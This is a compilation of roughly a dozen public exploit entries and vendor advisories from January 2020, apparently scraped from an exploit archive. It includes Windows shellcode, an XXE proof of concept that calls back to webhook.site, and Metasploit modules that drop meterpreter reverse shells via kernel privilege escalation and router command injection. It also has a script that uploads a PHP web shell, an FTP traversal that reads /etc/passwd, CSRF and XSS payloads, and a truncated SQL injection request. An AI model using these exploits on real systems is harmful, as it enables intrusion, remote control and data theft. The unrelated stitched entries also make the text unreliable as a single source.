# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
# Author: Saswat Nayak
# Date: 2020-01-22
# Shellcode length 9
# Tested on: Win 7 SP1-64

/*
***** Assembly code follows *****
xor eax,eax
xor ebx,ebx
xor ecx,ecx
mov eax,0x00000002
mov ebx,0x00020000
push ebx
push al
mov ecx,0x77661497
call ecx


*/

char code[]=

"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0";

int main(int argc, char **argv)
 {
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}

# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
<jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys
from pprint import pprint
import uuid

# Surf to https://webhook.site and copy/paste the URL below. Used for
XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

id = str(uuid.uuid1())

xml = '''<?xml version="1.0" encoding="UTF-8"
standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''

print(id)

response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
 headers=
{'User-Agent': 'MDM/1.0',
'Connection': 'close',
'Content-Type': 'application/x-apple-aspen-mdm'},
data=xml,stream=True
)
print(response.content)
print(response.text)
pprint(response)

# Exploit Title: Employee Leaves Management System 2.0 Cross-Site Request
Forgery
# Date: 22-01-2020
# Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/
# Software Link:
https://phpgurukul.com/employee-leaves-management-system-elms/
# Software: Employee Leaves Management System
# Version : 2.0
# Tested on Windows 10
# Vulnerability Type: Cross-Site Request Forgery
#Cross-site Request Forgery is an attack whereby an attacker tricks a
victim into performing actions on their behalf.
#*1. Description*
#The vulnerability exists due to failure in the "/managedepartments.php"
script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute
arbitrary code by sending a malicious request to a logged-in user.
#*2. Proof of Concept:* This example sends HTTP GET crafted request in
order to delete the specified department.
<html>
<body
<button class="button"><a href="
http://localhost/elms/admin/managedepartments.php?del=6">Click Me!</button>
</body>
</html>

SEC Consult Vulnerability Lab Security Advisory < 20200122-0 >
=======================================================================
              title: Reflected XSS
            product: ZOHO ManageEngine ServiceDeskPlus
 vulnerable version: <= 11.0 Build 11007
      fixed version: 11.0 Build 11010
         CVE number: CVE-2020-6843
             impact: medium
           homepage: https://www.manageengine.com/products/service-desk/
              found: 2019-12-01
                 by: Johannes Kruchem (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting
to delivering awesome customer service. It provides great visibility and central
control in dealing with IT issues to ensure that businesses suffer no downtime.
For 10 years and running, it has been delivering smiles to millions of IT folks,
end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/



Business recommendation:
------------------------
The vendor published a patch for ServiceDesk Plus with service pack 11010.

It is recommended to install the patch with the included patcher. An in-depth
security analysis performed by security professionals is highly advised, as the
software may be affected from further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
A parameter of the module called "geti18nkey" reflects unfiltered user input if
it is changed. The corresponding request is frequently sent in the background
if a pre-configured network scan was started.


Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
To reproduce the issue visit this URL authenticated as administrator:
http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key=<img%20src%20onerror%3dalert(1)>

How the parameter was found:
1) Authenticate as administrator and add an IP range in Admin -> Networkscan.
2) Click the "play" button next to the created IP range to start the scan.
3) To check the status of a started network scan frequent requests like
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key=sdp.admin.network.listview.discoverystatus.scanned&sdpcsrfparam=<%someUUID%>"
   are sent to the server.
4) The value of the "key" parameter will be reflected if you change a single character.
   The "sdpcsrfparam" isn't needed in order to trigger the XSS.
5) XSS can thus be exploited by calling
"http://$IP:8080/CustomReportHandler.do?module=geti18nkey&key=<img%20src%20onerror%3dalert(1)>"


Vulnerable / tested versions:
-----------------------------
The following versions have been tested which were the latest versions available at the
time of the test:
 - 10.5
 - 11.0 Build 11007


Vendor contact timeline:
------------------------
2019-12-05: Contacting vendor through ManageEngine Security Response Center (MESRC)
            Uploaded security advisory to bugbounty.zoho.com
2019-12-09: Vendor promised to fix the vulnerability.
2020-01-08: Reported issue has been fixed in service pack 11010.
2020-01-22: Public release of security advisory.


Solution:
---------
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#11010


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Johannes Kruchem / @2020

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation',
'Description'    => %q{
        This module attempts to gain root privileges on Linux systems by abusing
        a NULL pointer dereference in the `rds_atomic_free_op` function in the
        Reliable Datagram Sockets (RDS) kernel module (rds.ko).

        Successful exploitation requires the RDS kernel module to be loaded.
        If the RDS module is not blacklisted (default); then it will be loaded
        automatically.

        This exploit supports 64-bit Ubuntu Linux systems, including distributions
        based on Ubuntu, such as Linux Mint and Zorin OS.

        Target offsets are available for:

        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.

        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
        Failed exploitation may crash the kernel.

        This module has been tested successfully on various 4.4 and 4.8 kernels.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Mohamed Ghannam', # Discovery of RDS rds_atomic_free_op null pointer dereference and DoS PoC (2018-5333)
'Jann Horn',       # Discovery of MAP_GROWSDOWN mmap_min_addr bypass technique and PoC code (CVE-2019-9213)
'wbowling',        # C exploit combining 2018-5333 and CVE-2019-9213 targeting Ubuntu 16.04 kernel 4.4.0-116-generic
'bcoles',          # Metasploit module and updated C exploit
'nstarke'          # Additional kernel offsets
        ],
'DisclosureDate' => '2018-11-01',
'Platform'       => [ 'linux' ],
'Arch'           => [ ARCH_X64 ],
'SessionTypes'   => [ 'shell', 'meterpreter' ],
'Targets'        => [[ 'Auto', {} ]],
'Privileged'     => true,
'References'     =>
        [
          [ 'CVE', '2018-5333' ],
          [ 'CVE', '2019-9213' ],
          [ 'BID', '102510' ],
          [ 'URL', 'https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4' ],
          [ 'URL', 'https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c' ],
          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2' ],
          [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d' ],
          [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c' ]
        ],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
'Notes'          =>
        {
'Reliability' => [ REPEATABLE_SESSION ],
'Stability'   => [ CRASH_OS_DOWN ],
        },
'DefaultTarget'  => 0))
    register_advanced_options [
      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def check
    arch = kernel_hardware
    unless arch.include? 'x86_64'
      return CheckCode::Safe("System architecture #{arch} is not supported")
    end
    vprint_good "System architecture #{arch} is supported"

    offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
    kernels = offsets.scan(/"(.+?)"/).flatten

    version = "#{kernel_release} #{kernel_version.split('').first}"
    unless kernels.include? version
      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
    end
    vprint_good "Linux kernel #{version} is vulnerable"

    if smap_enabled?
      return CheckCode::Safe('SMAP is enabled')
    end
    vprint_good 'SMAP is not enabled'

    if lkrg_installed?
      return CheckCode::Safe('LKRG is installed')
    end
    vprint_good 'LKRG is not installed'

    if grsec_installed?
      return CheckCode::Safe('grsecurity is in use')
    end
    vprint_good 'grsecurity is not in use'

    unless kernel_modules.include? 'rds'
      vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'
      return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation')
    end
    vprint_good 'rds.ko kernel module is loaded'

    CheckCode::Appears
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      upload_and_chmodx exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.out')
    end
    register_file_for_cleanup exploit_path

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe
    register_file_for_cleanup payload_path

    # mincore KASLR bypass is usually fast, but can sometimes take up to 30 seconds to complete
    timeout = 30
    print_status "Launching exploit (timeout: #{timeout})..."
    output = cmd_exec("echo '#{payload_path} & exit' | #{exploit_path}", nil, timeout)
    output.each_line { |line| vprint_status line.chomp }
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'        => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
'Description' => %q{
        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
        /htdocs/cgibin), which is accessible without credentials.
      },
'Author'      =>
        [
'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
        ],
'License'     => MSF_LICENSE,
'References'  =>
        [
          [ 'CVE', '2019-17621' ],
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
        ],
'DisclosureDate' => 'Dec 24 2019',
'Privileged'     => true,
'Platform'       => 'linux',
'Arch'        => ARCH_MIPSBE,
'DefaultOptions' =>
        {
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '49152'
        },
'Targets'        =>
        [
          [ 'Automatic',  { } ],
        ],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget'  => 0,
      ))

  end

  def execute_command(cmd, opts)
    callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +
":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +
"/" + Rex::Text.rand_text_alpha(3..12)
    begin
      send_request_raw({
'uri'  => "/gena.cgi?service=`#{cmd}`",
'method' =>  'SUBSCRIBE',
'headers' =>
        {
'Callback' => "<#{callback_uri}>",
'NT' => 'upnp:event',
'Timeout' => 'Second-1800',
        },
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def exploit
    execute_cmdstager(linemax: 500)
  end
end

# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
# Exploit Author: boku
# Date: 2020-01-22
# Software Vendor: Wierd Solutions
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: BOOTP Turbo (x86) Version 2.0
# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit 
# Replicate Crash:
#  1) Download, Install, and Open BootP Turbo v2.0 for windows x86
#  2) Go to Edit > Settings > Click the Detailed Logging Box
#  3) Run python script, open created file 'crash.txt'
#  4) Select-All > Copy All, from file
#  5) Paste buffer in the 'Log File' text-box, Click 'OK'
#  6) Close the 'Control Service' Pop-Up Window
#  7) Crash with SEH Overwrite

# SEH chain of main thread
# Address    SE handler
# 019CD254   43434343
# 42424242   *** CORRUPT ENTRY ***

# Loaded Application Modules
#  Rebase | SafeSEH | ASLR  | NXCompat | Version, Modulename & Path
#  True   | True    | False |  False   | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
#  True   | True    | False |  False   | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
#  True   | True    | False |  False   | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
#  True   | True    | False |  False   | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
#  True   | True    | False |  False   | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)

#!/usr/bin/python

offset = '\x41'*2196
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'
filler = '\x44'*(3000-len(offset+nSEH+SEH))

payload = offset+nSEH+SEH+filler

try:
    f=open("crash.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")

# Exploit Title: Pachev FTP Server 1.0 - Path Traversal
# Date: 2020-01-23
# Vulnerability: Path Traversal
# Exploit Author: 1F98D
# Vendor Homepage: https://github.com/pachev/pachev_ftp

from ftplib import FTP

ip = raw_input("Target IP: ")
port = int(raw_input("Target Port: "))

ftp = FTP()
ftp.connect(host=ip, port=port)
ftp.login('pachev', '')                   
ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
ftp.close()
file = open('passwd.txt', 'r')
print "[**] Printing the contents of /etc/passwd\n"
print file.read()

SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >
=======================================================================
              title: Cross-Site Request Forgery (CSRF)
            product: Umbraco CMS
 vulnerable version: version 8.2.2
      fixed version: version 8.5
         CVE number: CVE-2020-7210
             impact: medium
           homepage: https://umbraco.com/
              found: October 2019
                 by: A. Melnikova (Office Moscow)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best
version of Umbraco and a big step forward in regard to making your work
with Umbraco simpler; simpler to extend, simpler to edit, simpler to
publish - simpler to use, simpler to enjoy."

Source: https://umbraco.com/products/umbraco-cms/umbraco-8/


Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without being noticed by the
victim. This attack always requires some sort of user interaction, usually
the victim needs to click on an attacker-prepared link or visit a page
under control of the attacker. Due to this, an attacker is able to
enable/disable or delete accounts. This may lead to DoS of user accounts.


Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted
on a malicious website, controlled by the attacker.

Example 1: HTML-code for disabling user:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close

)]}',
{"notifications":[{"header":"<USERNAME> is now disabled","message":"","type":3}],"message":"<USERNAME> is now disabled"}


Example 2: HTML-code for enabling user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID>" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close

)]}',
{"notifications":[{"header":"<USERNAME> is now enabled","message":"","type":3}],"message":"<USERNAME> is now enabled"}


Example 3: HTML-code for deleting user:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID>" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID> HTTP/1.1
Host: <host-URL>
[...]
Cookie: <ADMIN-COOKIE>


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie: <ADMIN-COOKIE>
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close

)]}',
{"notifications":[{"header":"User <USERNAME> was deleted","message":"","type":3}],"message":"User <USERNAME> was deleted"}


As soon as an authenticated victim (admin) visits a website with this HTML code
embedded, the payload would get executed in the context of the victim's
session. Although responses to these requests are not delivered to the
attacker, in many cases it is sufficient to be able to compromise the
integrity of the victim's information stored on the site or to perform
certain, possibly compromising requests to other sites.



Vulnerable / tested versions:
-----------------------------
The following version was tested and found to be vulnerable:
* version 8.2.2


Vendor contact timeline:
------------------------
2019-11-13: Contacting vendor through security@umbraco.com.
2019-11-13: Requesting encryption keys.
2019-11-14: Encryption issues.
2019-11-15: Encryption issues, sending advisory in unencrypted form.
2019-11-25: No response, requesting status update.
2019-11-28: Vendor confirmed vulnerability.
2020-01-03: Confirming the release date.
2020-01-14: Release of updated CMS version 8.5.0.
2020-01-23: Release of security advisory.


Solution:
---------
The vendor provides an updated version which should be installed immediately:
https://our.umbraco.com/download/releases/850


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Melnikova / @2020

# Exploit Title: qdPM 9.1 - Remote Code Execution
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2020-01-22
# Exploit Author: Rishal Dwivedi (Loginsoft)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Windows 10 (Python 2.7)
# CVE : CVE-2020-7246
# Exploit written in Python 2.7
# Tested Environment - Windows 10
# Path Traversal + Remote Code Execution

# Command - qdpm-exploit.py -url http://localhost/ -u user@localhost.com -p password
# -*- coding: utf-8 -*-
#!/usr/bin/python

import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()

def multifrm(
    userid,
    username,
    csrftoken_,
    EMAIL,
    HOSTNAME,
    uservar,
    ):
    request_1 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, uservar),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[remove_photo]': (None, '1'),
        }
    return request_1


def req(
    userid,
    username,
    csrftoken_,
    EMAIL,
    HOSTNAME,
    ):
    request_1 = multifrm(
        userid,
        username,
        csrftoken_,
        EMAIL,
        HOSTNAME,
'.htaccess',
        )
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
                                , files=request_1)
    request_2 = multifrm(
        userid,
        username,
        csrftoken_,
        EMAIL,
        HOSTNAME,
'../.htaccess',
        )
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
                                 , files=request_2)
    request_3 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, ''),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[photo]': ('backdoor.php',
'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
                         , 'application/octet-stream'),
        }
    upload_req = session_requests.post(HOSTNAME
            + 'index.php/myAccount/update', files=request_3)


def main(HOSTNAME, EMAIL, PASSWORD):
    result = session_requests.get(HOSTNAME + '/index.php/login')
    login_tree = html.fromstring(result.text)
    authenticity_token = \
        list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value"
             )))[0]
    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
'login[_csrf_token]': authenticity_token}
    result = session_requests.post(HOSTNAME + '/index.php/login',
                                   data=payload,
                                   headers=dict(referer=HOSTNAME
                                   + '/index.php/login'))
    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount'
            )
    account_tree = html.fromstring(account_page.content)
    userid = account_tree.xpath("//input[@name='users[id]']/@value")
    username = account_tree.xpath("//input[@name='users[name]']/@value")
    csrftoken_ = \
        account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
    final_tree = html.fromstring(get_file.content)
    backdoor = \
        final_tree.xpath("//input[@name='users[photo_preview]']/@value")
    print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' \
        + backdoor[-1] + '?cmd=whoami'


if __name__ == '__main__':
    parser = \
        ArgumentParser(description='qdmp - Path traversal + RCE Exploit'
                       )
    parser.add_argument('-url', '--host', dest='hostname',
                        help='Project URL')
    parser.add_argument('-u', '--email', dest='email',
                        help='User email (Any privilege account)')
    parser.add_argument('-p', '--password', dest='password',
                        help='User password')
    args = parser.parse_args()

    main(args.hostname, args.email, args.password)

# Exploit Title:  Genexis Platinum-4410 2.1 - Authentication Bypass
# Date: 20220-01-08
# Exploit Author: Husinul Sanub
# Author Contact: https://www.linkedin.com/in/husinul-sanub-658239106/
# Vulnerable Product: Genexis Platinum-4410 v2.1 Home Gateway Router https://genexis.co.in/product/ont/
# Firmware version: P4410-V2–1.28
# Vendor Homepage: https://genexis.co.in/
# Reference: https://medium.com/@husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206
# CVE: CVE-2020-6170

Vulnerability Details
======================
Genexis Platinum-4410 v2.1 Home Gateway Router discloses passwords of each users(Admin,GENEXIS,user3) in plain text behind login page source “http://192.168.1.1/cgi-bin/index2.asp". This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, changing passwords, upload malicious firmware etc.

How to reproduce
===================
Suppose 192.168.1.1 is the router IP and check view page source of login page “http://192.168.1.1/cgi-bin/index2.asp",There we can found passwords for each login accounts in clear text.


POC
=========
* https://youtu.be/IO_Ez4XH-0Y

# Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
# Date: 2020-01-20
# Exploit Author: PCEumel
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware
# Version: TP-Link TP-SG105E V4
# Tested on: TP-SG105E V4 1.0.0 Build 20181120
# Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
# CVE : N/A

# TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
# The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".
# It features a web front end and an application (Easy Smart Configuration Utility)
# for easy configuration management.

# The device does not properly restrict access to an internal API.
# It is therefore possible to remotely reboot the device by sending a HTTP POST
# request.

---

# POC :
curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi

---

Timeline :
2019-09-16 | Vendor notified 
2019-09-25 | Reply (they will patch it)
2019-12-24 | First patch for testing
2019-12-19 | Confirmed the functionality of the patch
2020-01-14 | Public patch available

# Exploit Title: Webtareas 2.0 - 'id' SQL Injection
# Date: 2020-01-23
# Exploit Author: Greg.Priest
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: Webtareas v2.0
# Tested on: Windows
# CVE : N/A

Webtareas v2.0 authenticated Sql injection 0day

Vulnerable Request:

POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 10.61.57.147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
